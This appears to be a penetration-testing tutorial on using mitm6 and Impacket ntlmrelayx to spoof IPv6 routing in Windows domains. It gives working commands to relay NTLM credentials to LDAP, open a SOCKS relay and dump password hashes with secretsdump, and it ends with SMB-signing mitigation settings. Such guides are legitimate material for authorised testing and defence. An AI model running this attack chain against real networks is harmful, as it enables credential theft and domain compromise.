Mitm6 is a penetration testing tool that targets weaknesses in how Windows networks handle IPv6. Even in environments that primarily use IPv4, Windows systems will often still listen for IPv6 traffic, and mitm6 takes advantage of this by impersonating an IPv6 router. Once a machine accepts it as a legitimate router, the attacker can redirect traffic and manipulate name resolution processes like WPAD or DNS. This allows them to capture authentication attempts, steal NTLM hashes, or relay credentials to services such as Active Directory. In essence, mitm6 enables an attacker to position themselves as a man-in-the-middle by exploiting default IPv6 behavior in Windows networks.
Impacket-NTMLRelayX is preinstalled with Kali Linux. Mitm6 is not installed with Kali Linux. Run the following command in the terminal to prompt the installer to appear.
mitm6
<!-- You can also install with this command. -->
sudo apt install mitm6
Use mitm6 to target LDAP in Kali Linux
<!-- To make this work, run both commands in separate terminals -->
sudo mitm6 -d domain-name.local
<!-- -d is domain, -t is target, -wh is wpad, -l folder location for loot -->
impacket-ntlmrelayx -6 -t ldap://IP-Domain-Controller -wh fakepad.domain-name.local -l /home/kali/Desktop/lootme
Start a SOCKS Proxy in Kali Linux
<!-- Start a SOCKS Proxy - Run commands in 3 separate Terminals -->
sudo mitm6 -d domain-name.local
impacket-ntlmrelayx -6 -socks -smb2support -t IP-Domain-Controller
<!-- During this session, run the following command to see admin status -->
socks
<!-- Dump Password -->
proxychains4 impacket-secretsdump domain-name/username@ip-address -no-pass
How to check if SMB is on
nmap -p 135,445 target_ip_address
Additional Commands
<!-- By default, ntlmrelayx uses relayed authentication sessions to conduct attacks, but it does not save the Net-NTLMv2 hashes that it intercepts. To log and save these hashes, use the --output-file (-of) option. -->
ntlmrelayx --output-file <hash_filename> [options]
Additional Information
On Windows Server, how to disable/enable SMB Signing.
GPO – Default Domain Policy – Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options.
“Microsoft network client: Digitally sign communications (always)”.
“Microsoft network server: Digitally sign communications (always)”.
(Optional) – If SMBv1 is enabled
“Microsoft network server: Digitally sign communications (if client agrees)”.